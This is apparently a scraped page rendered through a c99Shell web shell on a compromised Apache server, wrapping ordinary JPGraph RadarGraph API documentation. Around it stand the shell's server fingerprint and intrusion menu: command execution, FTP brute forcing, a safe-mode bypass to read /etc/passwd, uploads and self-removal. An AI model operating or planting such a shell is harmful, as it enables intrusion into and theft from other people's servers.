!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/jpgraph/docs/ref/   drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     RadarGraph.html (26.34 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

CLASS RadarGraph EXTENDS Graph
(Defined in: jpgraph_radar.php : 407)
 RadarGraph  Graph 
 Add() 
 HideTickMarks() 
 RadarGraph() 
 SetCenter() 
 SetColor() 
 SetPlotSize() 
 SetPos() 
 SetScale() 
 SetSize() 
 SetTickDensity() 
 SetTitles() 
 ShowMinorTickmarks() 
 Stroke() 
 SupressTickMarks() 
Add() 
 AddBand() 
 AddLine() 
 AddText() 
 AddY() 
 AddY2() 
 AdjBackgroundImage() 
 AdjImage() 
 CheckCSIMCache() 
 GetHTMLImageMap() 
 Graph() 
 Set3DPerspective() 
 Set90AndMargin() 
 SetAlphaBlending() 
 SetAngle() 
 SetAxisStyle() 
 SetBackgroundCFlag() 
 SetBackgroundCountryFlag() 
 SetBackgroundGradient() 
 SetBackgroundImage() 
 SetBackgroundImageMix() 
 SetBox() 
 SetClipping() 
SetColor() 
 SetFrame() 
 SetFrameBevel() 
 SetGridDepth() 
 SetIconDepth() 
 SetMargin() 
 SetMarginColor() 
SetScale() 
 SetShadow() 
SetTickDensity() 
 SetTitleBackground() 
 SetTitleBackgroundFillStyle() 
 SetY2OrderBack() 
 SetY2Scale() 
 SetYDeltaDist() 
 SetYScale() 
Stroke() 
 StrokeCSIM() 
 StrokeFrameBackground() 
 

Class usage and Overview
Spider graph. This graph type can only be used together with spider plots.

 


Class Methods

 

 

Add a spider plot to the spider graph

ArgumentDefaultDescription
&$splot  Plot to add (instance of SpiderPlot)

Description
Add a spider plot to the spider graph 

Example

$spidergraph->Add($spiderplot1);

 

 

Hide tick marks on spider axis

ArgumentDefaultDescription
$aFlag true True=Hide tick marks

Description
Hide tick marks on spider axis 

Example

$spidergraph->HideTickMarks();

 

 

Construct a new radar graph

ArgumentDefaultDescription
$width 300 Imaghe width
$height 200 Image Height
$cachedName "" Cache file name
$timeout 0 Cache timout (in minutes)
$inline 1 Inline image

Description
See Graph::Graph().  
 
See also
Graph::Graph

Example

$radargraph = new RadarGraph(300,300);

 

 

Specify position for center of spider graph

ArgumentDefaultDescription
$px  Fraction of width
$py 0.5 Fraction of height

Description
Specify the position for the center of the spider graph in fractions of the image width and height. 

Example

$spidergraph->SetCenter(0.6, 0.5);

 

 

Set background color for graph

ArgumentDefaultDescription
$c  Color

Description
Set background color for graph 

Example

$spidergraph->SetColor('lightyellow');

 

 

Specify size of spider graph

ArgumentDefaultDescription
$aSize  Fraction of image size

Description
DEPRECATED
Use SetSize() instead
Specify the length of the axis of the spider plot as fraction of the min(height,width) 
 
See also
RadarGraph::SetCenter and RadarGraph::SetSize

Example

$radargraph->SetPlotSize(0.7);

 

 

Alias for Set Center. Specify position of the center of the graph

ArgumentDefaultDescription
$px  Fraction of width
$py 0.5 Fraction of height

Description
Alias for SetCenter. Specify position for the center of the graph. 
 
See also
RadarGraph::SetCenter

Example

$graph->SetPos(0.5,0.6);

 

 

Specify manual scale for spider graph

ArgumentDefaultDescription
$axtype  Axis type
$ymin 1 Min Y-value
$ymax 1 Max Y-value

Description
Specify axis type and min/max value for the scale. 

Example

$spidergraph->SetScale('lin',0,50);

 

 

Specify the length of the axis

ArgumentDefaultDescription
$aSize  Fraction of image size

Description
pecify the length of the axis of the spider plot as fraction of the min(height,width) 

Example

$radargraph->SetPlotSize(0.7);

 

 

Specify tick density

ArgumentDefaultDescription
$densy TICKD_NORMAL Density

Description
Tick density can be specified as
  • TICKD_DENSE, Tick marks close
  • TICKD_NORMAL, Tick marks as normal
  • TICKD_SPARSE, Tick marks sparse
  • TICKD_VERYSPARSE, TIck marks very sparse
 

Example

$spidergraph->SetTickDensity(TICKD_VERYSPARSE);

 

 

Specify titles for all the spider axis

ArgumentDefaultDescription
$title  Array of titles

Description
Set the title for the axis in the spider graph. If no titles have been specified then they will be numbered from 1 to maximum number of axis. 

Example

$spidergraph->SetTitles(array('Jan','Feb','March','Apr'));

 

 

Show minor tick marks

ArgumentDefaultDescription
$aFlag true True=Show minor tick marks

Description
By default the minor tick marks are hidden. This method turns them on. 

Example

$spidergraph->ShowMinorTickMArks();

 

 

Stroke the Spider graph

ArgumentDefaultDescription
$aStrokeFileName "" Filename

Description
Stroke the spider graph and send it back to the browser or write it to a file if a filename have been specified. This is normally the last method call in your script. 
 
See also
Graph::Stroke

Example

$spidergraph->Stroke();

 

 

Suppress all tick marks on the spider axis

ArgumentDefaultDescription
$f true True=Hide tick marks

Description
Suppress all tick marks on the spider axis 
 
See also
RadarGraph::ShowMinorTickmarks

Example

$spidergraph->SupressTickMarks();



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--